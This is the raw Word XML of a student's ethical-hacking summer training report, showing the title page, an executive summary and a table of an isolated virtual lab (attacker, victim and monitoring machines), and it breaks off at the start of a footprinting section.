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CC0D9" w:themeColor="accent4" w:themeTint="66"/>
  <w:body>
    <w:p w14:paraId="202E52EC" w14:textId="1FE3431B" w:rsidR="00010BDF" w:rsidRPr="00A470E4" w:rsidRDefault="00B71DED">
      <w:pPr>
        <w:spacing w:before="2400" w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A470E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>SUMMER TRAINING DOCUMENT ON ETHICAL HACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2FDE95" w14:textId="6D2E84A8" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:spacing w:after="3600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Academic Summer Training Technical Document Covering Advanced Reconnaissance, Network Enumeration, Multi-Stage Attack Engineering, and Defensive Mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B71DED">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8DD263" w14:textId="4B47DBFD" w:rsidR="00B71DED" w:rsidRPr="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00B71DED">
        <w:t xml:space="preserve">Prepared </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B71DED">
        <w:t>By :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B71DED">
        <w:t xml:space="preserve">-                                                             </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71DED">
        <w:t xml:space="preserve">          Submitted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B71DED">
        <w:t>To:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="069AD100" w14:textId="61C93EB1" w:rsidR="00B71DED" w:rsidRDefault="00B71DED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71DED">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Aganya Rana                                                                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidRPr="00B71DED">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">         Dr. Yogesh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sir</w:t>
      </w:r>
      <w:r w:rsidR="00D4209A" w:rsidRPr="00B71DED">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B71DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>25011030</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">05 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E9255A" w14:textId="068710C4" w:rsidR="00010BDF" w:rsidRPr="00B71DED" w:rsidRDefault="00B71DED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AI &amp; DS [5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="00B71DED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SEM]</w:t>
      </w:r>
      <w:r w:rsidR="00D4209A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8581C1" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56431301" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686968B8" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA4F582" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604ACCC7" w14:textId="2EE34398" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>1. Executive Summary &amp; Training Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54CE93" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>This technical document details the engineering activities, tactical methodologies, and hands-on lab deployments executed during the comprehensive summer training program in Ethical Hacking and Penetration Testing. Operating in a fully structured, isolated virtualization architecture, this training integrated both offensive exploitation frameworks and defensive mitigation arrays. The primary core objective was to map out the modern threat matrix, understand the tactical lifecycle of complex Advanced Persist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>ent Threats (APTs), and develop actionable remediation architectures including Web Application Firewalls (WAF) and central Security Operations Center (SOC) logging frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3B6990" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B7C305" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572304B0" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4CC22E" w14:textId="5EC20EAA" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00A470E4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Environmental Infrastructure and Network Topologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F8276A" w14:textId="7FC54745" w:rsidR="00A470E4" w:rsidRPr="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00A470E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>To ensure a completely risk-free, compliant, and operationally rigorous execution environment, all training exercises were conducted on dedicated, sandboxed hypervisors utilizing VirtualBox and VMware instances with zero outbound public internet access. The master network topology consisted of three dynamically isolated VMs assigned static IP nodes within the private Class C subnet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7687E761" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D170CDA" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A0A697" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E93DE4" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRPr="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00A470E4"/>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:tblpXSpec="center" w:tblpY="1"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="37C1FFA3" w14:textId="77777777" w:rsidTr="00A470E4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31443860" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>VM Entity Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2133965D" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Operating System Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="531C3F4E" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Assigned IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B365D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7DB58526" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Operational Scope &amp; Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="3D7920F5" w14:textId="77777777" w:rsidTr="00A470E4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33666F60" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF" w:rsidP="00A470E4"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BCB8F43" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF" w:rsidP="00A470E4"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B43F1EE" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF" w:rsidP="00A470E4"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08A50338" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF" w:rsidP="00A470E4"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="17C42BBB" w14:textId="77777777" w:rsidTr="00A470E4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6AF237E2" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Attacker Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6956D3FB" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Kali Linux (Latest Release)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="430F4031" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>192.168.56.20 / .101</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B1E62E1" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Advanced enumeration, Scapy script execution, Metasploit payload staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="315D82E9" w14:textId="77777777" w:rsidTr="00A470E4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5BCE5E2D" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Victim Node</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16FFDBDC" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Windows 10/11 / IIS Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70A255E5" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>192.168.56.30 / .102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1EC61D44" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Target host hosting local IIS application server and monitored file shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="026A055A" w14:textId="77777777" w:rsidTr="00A470E4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6B73E9E0" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Defensive Monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="58E03048" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Security Onion (v3.1 Standalone)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2BA92861" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>192.168.56.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="137ECC23" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A" w:rsidP="00A470E4">
            <w:r>
              <w:t>Network traffic sniffing, Suricata NIDS alerts, OpenCanary honeypot engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="385C0EBC" w14:textId="663CDF55" w:rsidR="00010BDF" w:rsidRDefault="00A470E4">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
      <w:r w:rsidR="00D4209A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
        <w:t>Before initiating any live payload injection, real-time protection arrays and Windows Defender signatures were strictly governed on the victim machine to replicate deep enterprise compromise scenarios and test baseline infrastructure telemetry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A25919A" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Footprinting</w:t>
      </w:r>
